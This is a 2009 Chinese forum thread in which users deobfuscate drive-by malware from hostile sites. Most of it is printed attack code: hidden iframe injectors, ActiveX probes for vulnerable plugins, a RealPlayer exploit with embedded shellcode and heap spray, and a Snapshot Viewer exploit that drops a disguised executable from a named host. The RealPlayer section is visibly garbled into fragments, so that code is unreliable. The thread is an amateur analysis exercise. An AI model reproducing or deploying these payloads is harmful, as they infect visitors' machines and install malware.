[解密悬赏][第17期][完成]

雨宫优子

原帖由 taoyuan237 于 2009-1-23 17:01 发表
http://d.oixka.com/new/a1.css不就是这个吗？？？有什么好解的？？？

就是这个？？..
再仔细看看？

taoyuan237

原帖由 aarwwefdds 于 2009-1-23 17:04 发表

就是这个？？..
再仔细看看？

马上下了。没时间解了。暂时就这样吧。不过说一下。我是菜鸟。不是什么高手。
网页解密是业余学的学的不好

Sherry.ai

汗...这个好麻烦，这个年头几乎到处都是fxx
如果不开监控进入的的话。。。

人可

这个网址太多.裸奔进去.会在临时文件夹中找到这个htm
function setCookie(name, value, expire) {
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name) {
        var search = Name + "=";
        if (window.document.cookie.length > 0) {
                offset = window.document.cookie.indexOf(search);
                if (offset != -1) {
                        offset += search.length;
                        end = window.document.cookie.indexOf(";", offset)
                        if (end == -1) end = window.document.cookie.length;
                        return unescape(window.document.cookie.substring(offset, end));
                }
        }
        return null;
}
function register(name) {
        var today = new Date();
        var expires = new Date();
        expires.setTime(today.getTime() + 1000*60*60*12);
        setCookie("SenFe", name, expires);
}
function SenFe() {
        var c = getCookie("SenFe");
        if (c != null) { return; }
        register("uu56");
        document.write("<iframe height=0 width=0 src='http://www.bengchinn.cn/ydll/3.htm'></iframe>");
}
SenFe();
document.write("<a href=\"http://www.myleyuan.com/\" target=\"_blank\"><img src=\"http://ad.goosms.cn/apple/760x60.jpg\" border=\"0\"></a>");

'http://www.bengchinn.cn/ydll/3.htm'这个地址就是.

第一次解竟然中了~~

继续下去发现N多的漏洞挂马
= =只能尝试玩玩

000>hxxp://www.709sese.cn/a123/fxx.htm[/url]的....  貌似判断漏洞 = =
然后调用

<Script>
document.write("<Iframe width=100 height=0 src=fx.htm></iframe>");
document.write("");var ssdfs="d";
document.write("<Iframe width=100 height=0 src=../a1/ss.htm></iframe>");
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<Iframe width=100 height=0 src=../a1/Ms06014.htm></iframe>");
try{var m;
var hw=new ActiveXObject("Downloader.DLoader.1");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/sina.htm></iframe>");}}
try{var n;var qxxxxx="dxac";var qxaaxx="aaaac";var povjudgqjx="fsdfvjjt";
var hl=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1");}
catch(n){};                     
finally{if(n!="[object Error]"){document.write("Downloader.DLoader.1");
document.write("<Iframe width=100 height=0 src=../a1/no.htm></iframe>");}}var ddddddddd="dddddddddds";
try{var b;
var ml=new ActiveXObject("MPS.StormPlayer");}
catch(b){};                     
finally{if(b!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/bfyy.htm></iframe>");}}var sdddd="x";var sdddd="x";
try{var f;
var gw=new ActiveXObject("GLIEDown.IEDown.1");}
catch(f){};                     
finally{var dxl="x";if(f!="[object Error]"){document.write("<Iframe width=100 height=0 src=../a1/GLWORLD.html></iframe>");}}
function test()
{
rrooxx = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Like = new ActiveXObject(rrooxx);
}catch(error){return;}
vvvvv = Like.PlayerProperty("PRODUCTVERSION");
if(vvvvv<="6.0.14.552"){var ammc="dsvb";
document.write('<iframe style=display:none src="../a1/real.htm"></iframe>');}
else
document.write('<iframe style=display:none src="../a1/real.hTml"></iframe>');
}
test();
document.write("");document.write("");document.write("");document.write("");var fjd="fdsfsd";abc="dfdae";document.write("");var fkav="BS";var fkasaccv="BS";var fkaqfccv="BS";var fkaqjfccv="BS";var bccv="BS";
</script>

<script>
window["onerror"]=function (){
return true;

}
function init(){var kdslsd="asdcbn";
window["status"]="";

}window["onload"]=init;
if(document.cookie.indexOf("play=")==-1)
{var ppppvvvv="gppp";var expires=new Date();var spnbv="fdsfds";
expires.setTime(expires.getTime()+0*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
  
  document.write("");
  document.write("<IFrame src=Ilink.html width=100 height=0></iframe>");  
  document.write("");  
  
}
else {
  
  document.write("");
  var sdcxcap="ds";
  document.write("<iframe src=flink.html width=100 height=0></iframe>");var xfcx="xqc";
}}
var ksp="nishiyizhizhu";var fkasacv="BS";var fkqcacv="BS";var qxqcacv="BS";
</script>

001>hxxp://www.709sese.cn/a1/real.htm[/url]的 不知是不是

<script language=
JavaScript
>
];
toLowerCase
]();
msie 6
)==-1&&user.indexOf(
msie 7
)==-1)return ;
nt 5.
)==-1)return ;
IaaaEaaaR
PaaaCaaataaal.I
EaaaRaaaP
Caaataaal.1
;
ActiveXObject
](RealplayerObj[
replace
](/a/g,
))
PRODUCT
;
VERSION
;
chilam
;
6.0.14.544
;
PlayerProperty
](CuteRealVersions);
;
;if(RealVersion.indexOf(
6.0.14.
)==-1){
zh-cn
)ret=unescape(addr[1]);
en-us
)ret=unescape(addr[2]);
6.0.14.550
)ret=unescape(addr[4]);
6.0.14.552
)ret=unescape(addr[5]);
6.0.14.543
)ret=unescape(addr[6]);
6.0.14.536
)ret=unescape(addr[7]);
6.0.10.
)!=-1){
6.0.11.
)!=-1){
6.0.12.
)!=-1){var dadong=
mybr
;
6.0.14.
)!=-1){
Fucking AntiVirus
;qwfgsg=
LLLL\%XXXXLD
;Ball=Qqs;ShellCode=
;ShellCode=ShellCode+
TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI
;ShellCode=ShellCode+
xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv
;ShellCode=ShellCode+
3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEB
;ShellCode=ShellCode+
sHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGO
;ShellCode=ShellCode+
NuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMw
;ShellCode=ShellCode+
runOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCX
;ShellCode=ShellCode+
HmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQK
;ShellCode=ShellCode+
e6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI
;ShellCode=ShellCode+
5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQ
;ShellCode=ShellCode+
OjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWL
;ShellCode=ShellCode+
gOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5
;ShellCode=ShellCode+
PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcEN
;ShellCode=ShellCode+
eStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw
;ShellCode=ShellCode+
2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwW
;ShellCode=ShellCode+
qvRHptd4RPFZVOdoSTTnrOSYPx0k3QVN2CPobMtopnPerWvO0aTqFNPcT3Psopwp
;C2=
;xcbfcxn=sdfdgdfg+qwfgsg+ShellCode;temp=0x8000;while(xcbfcxn.length<temp)xcbfcxn+=
lizhen
;var arr1=[
c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav
c:\\Program Files\\NetMeeting\\TestSnd.wav
C:\\WINDOWS\\system32\\BuzzingBee.wav
C:\\WINDOWS\\clock.avi
c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav
C:\\WINDOWS\\system32\\LoopyMusic.wav
];Gamttt_Anhey_Real_Exp_Send[
import
](arr1[Math.floor(Math[
random
]()*6)],xcbfcxn,
123456456
,0,0)

hXXp://www.709sese.cn/a1/glworld.html 这个因为诺顿拦截进不去
估计接近了 = =

一会儿继续................

[ 本帖最后由 拍黄瓜 于 2009-1-23 18:09 编辑 ]

找到个CSS   
都不知道自己走到哪里了
那个CSS又进不去

<script type="text/javascript">
function rpppr()
{
return true;
}
window.onerror = rpppr;
var x;
var mybrcar;
var tu_bj = new Array();
tu_bj[0] = "c:/Program Files/Outlook Express/wab.exe";
tu_bj[1] = "d:/Program Files/Outlook Express/wab.exe";
tu_bj[2] = "e:/Program Files/Outlook Express/wab.exe";
var p33333s333333spspq = new ActiveXObject("snpvw.Snapshot V"+"iewerControl.1");
if(p33333s333333spspq="[object]")
{
setTimeout('window.location = "ldap://"',3000);
for (x in tu_bj)
{
mybrcar = new ActiveXObject("snpvw.Snapshot ViewerControl.1")
var tuf1 = 'http://d.oixka.com/new/a1.css';
var tuf2=tu_bj[x];
mybrcar.Zoom = 0;
mybrcar.ShowNavigationButtons = false;
mybrcar.AllowContextMenu = false;
mybrcar.SnapshotPath = tuf1;var dddsdsd="d";

try
{
mybrcar["C"+"ompressedPath"] = tuf2;
mybrcar[" 50 72 69 6e 74 53 6e 61 70 73 68 6f 74"]();
}catch(e){}
}
}
var fkasacv="BS";var fkqhasacv="BS";
</script>
<br>
<br>
<br>
<br>

雨宫优子

的确很乱...


建议你可以去看看教程


http://share.hostse.com/index.php?act=category&id=4


最下面那个

雨宫优子

CSS就是EXE


改名一下就可以运行了...

解出来了............
那个css竟然是可执行文件...............
还是感染型的... dll exe

早不讲...............